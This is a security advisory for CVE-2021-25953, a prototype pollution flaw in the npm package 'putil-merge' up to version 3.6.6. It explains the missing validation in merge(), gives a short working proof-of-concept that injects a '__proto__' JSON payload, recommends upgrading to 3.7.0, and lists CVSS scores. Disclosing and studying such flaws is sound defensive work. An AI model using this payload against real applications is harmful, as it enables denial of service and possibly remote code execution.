
We found results for “”
CVE-2021-25953
Date: July 14, 2021
Overview
Prototype pollution vulnerability in 'putil-merge' versions1.0.0 through 3.6.6 allows attacker to cause a denial of service and may lead to remote code execution.Details
The NPM module `putil-merge` can be abused by Prototype Pollution vulnerability since the function `merge()` does not check for the type of object before assigning value to the property. Due to this flaw an attacker could create a non-existent property or be able to manipulate the property which leads to Denial of Service or potentially Remote code execution.PoC Details
The `merge()` function due to the absence of validation on the values passed into the argument, an attacker can supply a malicious value by adjusting the value to include the `__proto__` property. Since there is no validation before assigning the property to check whether the assigned argument is the Object's own property or not, the property `polluted` will be directly assigned to the new object thereby polluting the Object prototype.PoC Code
var putil_merge = require("putil-merge")
const payload = JSON.parse('{"__proto__":{"polluted":"Polluted"}}');
var obj = {};
console.log("Before: " + obj.polluted);
putil_merge(obj, payload, {deep:true});
console.log("After: " + obj.polluted);
var obj_new =[]
console.log("obj_new also gets the polluted attribute with the value of " + obj_new.polluted)
Affected Environments
1.0.0 to 3.6.6Prevention
Upgrade to version 3.7.0Language: JS
Good to know:


Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | None |
User Interaction (UI): | None |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Low |
Authentication (AU): | None |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |